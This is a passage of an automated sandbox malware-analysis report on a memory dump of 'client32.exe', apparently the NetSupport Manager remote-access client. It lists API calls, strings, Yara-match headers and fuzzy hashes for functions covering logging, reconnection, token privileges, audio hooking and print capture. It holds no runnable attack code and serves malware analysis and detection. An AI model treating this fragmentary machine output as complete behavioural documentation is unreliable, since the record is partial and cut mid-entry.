                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 110FF7FC
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 110FF80A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentThread$ErrorLast__wcstoi64
                                                                                                                                                                • String ID: *Log_%d$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
                                                                                                                                                                • API String ID: 2021241812-3565238984
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memset_strncat_strncpy$_calloc
                                                                                                                                                                • String ID: Drivers$PrintCapture$Printer
                                                                                                                                                                • API String ID: 3453565913-1525524346
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                • wsprintfA.USER32 ref: 1105D96E
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1105D9B8
                                                                                                                                                                • WaitForInputIdle.USER32(?,00001388), ref: 1105D9CD
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 1105DA01
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FolderPath$CloseFileHandleIdleInputModuleNameSleepWaitwsprintf
                                                                                                                                                                • String ID: %s%s$Cobrowse FindWindow ret %x$Cobrowse WaitForInputIdle ret %x$NSMCobrMain$NSMCobrProxy$client32.exe /cobrowse
                                                                                                                                                                • API String ID: 1983868302-3988794623
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 11015678
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110156D4
                                                                                                                                                                • RegisterClassA.USER32(00000003), ref: 110156EE
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • CreateWindowExA.USER32(00000008,NSMIdentifyWnd,?,90000000,?,?,?,?,00000000,00000000,00000000), ref: 1101574F
                                                                                                                                                                • UpdateWindow.USER32(00000000), ref: 1101579D
                                                                                                                                                                • SetTimer.USER32(00000000,00000001,?,00000000), ref: 110157D0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Windowwsprintf$ClassCreateCursorErrorExitLastLoadMessageProcessRegisterTimerUpdate
                                                                                                                                                                • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 1905683801-3620323974
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000000), ref: 110276BF
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 110276C6
                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?,?,00000000), ref: 110276E8
                                                                                                                                                                • _malloc.LIBCMT ref: 110276EE
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027708
                                                                                                                                                                • LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027729
                                                                                                                                                                • _free.LIBCMT ref: 11027754
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,1102FA1C), ref: 11027766
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Token$InformationProcess$AllocateCloseCurrentHandleHeapLookupNameOpenPrivilege_free_malloc
                                                                                                                                                                • String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
                                                                                                                                                                • API String ID: 2190874299-3275751932
                                                                                                                                                                • Opcode ID: 0271db90772607bb65eaa6d9bb4202db7e906805055f1da97c36a874af3719c6
                                                                                                                                                                • Instruction ID: 7efe3961d46ca3303e5913aa27d02a5643f2587f40a0b85f69ee505bdaa5acf5
                                                                                                                                                                • Opcode Fuzzy Hash: 0271db90772607bb65eaa6d9bb4202db7e906805055f1da97c36a874af3719c6
                                                                                                                                                                • Instruction Fuzzy Hash: DB2171B5E00219ABDB10DFE4CC84EAFBBBCEF44718F144129E915A7244D771B906CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 1106F397
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeavewsprintf
                                                                                                                                                                • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                                                                                                • API String ID: 3005300677-3496508882
                                                                                                                                                                • Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                                                                                                • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                                                                                                • Opcode Fuzzy Hash: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                                                                                                • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
                                                                                                                                                                APIs
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B497
                                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 1103B4BE
                                                                                                                                                                  • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                                                                                • _fgets.LIBCMT ref: 1103B55F
                                                                                                                                                                • _free.LIBCMT ref: 1103B5C6
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1103B69C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$CloseErrorExitFolderHandleLastMessageNamePathProcessUser__strdup_fgetswsprintf
                                                                                                                                                                • String ID: IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                • API String ID: 2727059318-37391384
                                                                                                                                                                • Opcode ID: 21042dabe4302790889957fcdf0b193290070831c9d0ae23097ecb091f194145
                                                                                                                                                                • Instruction ID: 9cbe2027e90b6485a44e8e4046be3e5472a02b3b41cc18688c1d521a1ff731bb
                                                                                                                                                                • Opcode Fuzzy Hash: 21042dabe4302790889957fcdf0b193290070831c9d0ae23097ecb091f194145
                                                                                                                                                                • Instruction Fuzzy Hash: 2A717E75D0071A9FDB15DBA4CC84FEEB3B8AF48308F0442D8D519A7281EB75AA44CF90
                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 110CD68D
                                                                                                                                                                • BeginDeferWindowPos.USER32(?), ref: 110CD6D8
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 110CD703
                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CD730
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • NSMDlg::PositionControls(), dlg L=%d, T=%d, W=%d, H=%d, dlgdx=%d, dlgdy=%d, xrefs: 110CD6BE
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110CD673
                                                                                                                                                                • m_hWnd, xrefs: 110CD678
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Rect$BeginClientDeferErrorExitLastMessagePointsProcesswsprintf
                                                                                                                                                                • String ID: NSMDlg::PositionControls(), dlg L=%d, T=%d, W=%d, H=%d, dlgdx=%d, dlgdy=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 1318711716-1344931218
                                                                                                                                                                • Opcode ID: a4c641170c47423e8ac78e3ea5506bb8afe3d0493dba1b3bb21fb16a67788885
                                                                                                                                                                • Instruction ID: ee80f69412d45a004da56ef9482371e3e8ce3d7f15b35d2ad78fffd79bf35d29
                                                                                                                                                                • Opcode Fuzzy Hash: a4c641170c47423e8ac78e3ea5506bb8afe3d0493dba1b3bb21fb16a67788885
                                                                                                                                                                • Instruction Fuzzy Hash: 5D71E4B5E00609AFCB14CFA9D984AAEFBF5FF88714B108659E425A7744D730B841CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • GetOverlappedResult.KERNEL32(?,59FD4680,FFFFFFFF,00000001), ref: 1100B78C
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1100B796
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1100B7F9
                                                                                                                                                                • wsprintfA.USER32 ref: 1100B836
                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1100B8EF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                                                                                                                                • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                                                                                                                                • API String ID: 3598861413-432254317
                                                                                                                                                                • Opcode ID: 39ac341e869e7e4ca3b07b9f6877c66a67265ff52a029bc38a796ebafe24891f
                                                                                                                                                                • Instruction ID: 45def2f4c6c1e8bedf13dc8d5f6af1e3bd34cd83063a32ab0d32664e281c8988
                                                                                                                                                                • Opcode Fuzzy Hash: 39ac341e869e7e4ca3b07b9f6877c66a67265ff52a029bc38a796ebafe24891f
                                                                                                                                                                • Instruction Fuzzy Hash: FC51E3B8D00A1AABE710DF64CC84ABBB7F8FF48749F004519F56993281E734B980C7A5
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,59FD48C0,00000000,00000000,757323A0,11059867,00000000,00000000), ref: 11059618
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1105973A
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,0002001F,?), ref: 110596CD
                                                                                                                                                                • RegDeleteValueA.ADVAPI32(?,?), ref: 110596ED
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 110596F7
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 11059730
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$CloseDeleteEnterErrorEventExitLastLeaveMessageOpenProcessValuewsprintf
                                                                                                                                                                • String ID: CltReconn.cpp$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect$gMain.pReconnThread
                                                                                                                                                                • API String ID: 1302350719-2578778249
                                                                                                                                                                • Opcode ID: 68027b3c7ee8842ef61d89125159b96b6acee97a4b5633a2cea115a7ef36fa4b
                                                                                                                                                                • Instruction ID: 2a435f2b6dcbcd6807d97d44f0875f24cd397b994a036d807f1c9080d97eba21
                                                                                                                                                                • Opcode Fuzzy Hash: 68027b3c7ee8842ef61d89125159b96b6acee97a4b5633a2cea115a7ef36fa4b
                                                                                                                                                                • Instruction Fuzzy Hash: 8D41E675D0461AAFD781CF74C8C0AAABBA9FB4A714F514269E925D7240F731E809CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindow.USER32(?), ref: 11047211
                                                                                                                                                                • _malloc.LIBCMT ref: 110472AD
                                                                                                                                                                • _memmove.LIBCMT ref: 11047312
                                                                                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,000802A6,00000005,00000002,00002710,?), ref: 11047372
                                                                                                                                                                • _free.LIBCMT ref: 11047379
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
                                                                                                                                                                  • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
                                                                                                                                                                  • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
                                                                                                                                                                  • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
                                                                                                                                                                  • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                                                                                                • String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                • API String ID: 3960737985-1318765656
                                                                                                                                                                • Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                                                                                                • Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
                                                                                                                                                                • Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                                                                                                • Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                                                                                                  • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                                                                                                • _memmove.LIBCMT ref: 1102D24A
                                                                                                                                                                • _memmove.LIBCMT ref: 1102D26E
                                                                                                                                                                • _memmove.LIBCMT ref: 1102D2A8
                                                                                                                                                                • _memmove.LIBCMT ref: 1102D2C4
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1102D30E
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1102D323
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                                • String ID: deque<T> too long
                                                                                                                                                                • API String ID: 827257264-309773918
                                                                                                                                                                • Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                                                                                                • Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
                                                                                                                                                                • Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                                                                                                • Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
                                                                                                                                                                APIs
                                                                                                                                                                • _strncpy.LIBCMT ref: 1113B5CF
                                                                                                                                                                • IsWindow.USER32(00000000), ref: 1113B601
                                                                                                                                                                • _malloc.LIBCMT ref: 1113B660
                                                                                                                                                                • _memmove.LIBCMT ref: 1113B6C5
                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,0000004A,000802A6,00000003,00000002,00002710,?), ref: 1113B71F
                                                                                                                                                                • _free.LIBCMT ref: 1113B726
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFreeHeapLastMessageSendTimeoutWindow_free_malloc_memmove_strncpy
                                                                                                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                • API String ID: 1602665774-2270926670
                                                                                                                                                                • Opcode ID: d2f65b4893a4b113bd1b975723f5e0f7d18ba14633015f12ae9014c407eed244
                                                                                                                                                                • Instruction ID: 0eb2f4ed3c193268d82c3344ddec75665aa68b4e15ddc527d606e76f9d1459b3
                                                                                                                                                                • Opcode Fuzzy Hash: d2f65b4893a4b113bd1b975723f5e0f7d18ba14633015f12ae9014c407eed244
                                                                                                                                                                • Instruction Fuzzy Hash: 0151B074A0110AAFDB00DF94DD81FDEF7B5FF95318F044124F919AB281EA70AA04CBA5
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110B7920: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7946
                                                                                                                                                                  • Part of subcall function 110B7920: GetProcAddress.KERNEL32(00000000), ref: 110B794D
                                                                                                                                                                  • Part of subcall function 110B7920: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7963
                                                                                                                                                                • wsprintfA.USER32 ref: 110096FF
                                                                                                                                                                • wsprintfA.USER32 ref: 11009719
                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009803
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                                                                                                                • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                                                                                                                • API String ID: 559337438-1872371932
                                                                                                                                                                • Opcode ID: af71b0923a1d4120740ce45f998e2adca2c9fc1ba50e23a94cd7c026d3225f91
                                                                                                                                                                • Instruction ID: ac38ff220fce49fe95aa0d50a934cc281f992a81e8d226226224e10aeb55a698
                                                                                                                                                                • Opcode Fuzzy Hash: af71b0923a1d4120740ce45f998e2adca2c9fc1ba50e23a94cd7c026d3225f91
                                                                                                                                                                • Instruction Fuzzy Hash: 38512631D0425E9FE715CF789894BDABBE4AB09348F0081E4D54DDB241FA31AA44CB91
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fread_nolock_fseek$_free_malloc_memset
                                                                                                                                                                • String ID: PCIR
                                                                                                                                                                • API String ID: 2419779768-1011558323
                                                                                                                                                                • Opcode ID: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
                                                                                                                                                                • Instruction ID: 1ccd7dea2f775c367685aa3e1c73f4b59a6156879e869ee7e214f681fe7cb03c
                                                                                                                                                                • Opcode Fuzzy Hash: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
                                                                                                                                                                • Instruction Fuzzy Hash: A94106B1F01318ABEB10CFA4DD41BDEB7BEEF81308F104069EC09AB240DA72A901C795
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocalTime.KERNEL32(?,000000F2,00000001), ref: 1106B4C0
                                                                                                                                                                • wsprintfA.USER32 ref: 1106B511
                                                                                                                                                                • wvsprintfA.USER32(00000000,00000000,?), ref: 1106B540
                                                                                                                                                                • _fputs.LIBCMT ref: 1106B5A5
                                                                                                                                                                  • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                                                                                                  • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandLocalStringsTime__fsopen_fputswsprintfwvsprintf
                                                                                                                                                                • String ID: %02d-%s-%02d %02d:%02d:%02d $..\ctl32\Connect.cpp$MODEM.LOG$_tcslen (buf) < _tsizeof (buf)
                                                                                                                                                                • API String ID: 2115059068-1537580878
                                                                                                                                                                • Opcode ID: fa61c650d943bb0fa491be057d51e2ac83cf3ef0e888a2d54108ae40a0af48be
                                                                                                                                                                • Instruction ID: 5d2c35739838bb834d3b3d3efafd746ba003c3fabde1782874e9b65cfd7eed37
                                                                                                                                                                • Opcode Fuzzy Hash: fa61c650d943bb0fa491be057d51e2ac83cf3ef0e888a2d54108ae40a0af48be
                                                                                                                                                                • Instruction Fuzzy Hash: 7541CBF590012D9AC715CF64DC80BFEB7B9AF44348F0481E9E9095B145EA7166C9CBA4
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • %02X , xrefs: 111474D2
                                                                                                                                                                • Callstack:, xrefs: 111474EF
                                                                                                                                                                • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:, xrefs: 1114748D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$CurrentReadThread
                                                                                                                                                                • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:
                                                                                                                                                                • API String ID: 477357799-160799177
                                                                                                                                                                • Opcode ID: 3b29731f2fcac8cdf4188579606b588cad6f6aa37c3165fe8824c1b26f510daf
                                                                                                                                                                • Instruction ID: 688bc027546cad6e23cb765a90b036e17549c8c065315ec51cb57d9c97b2bd93
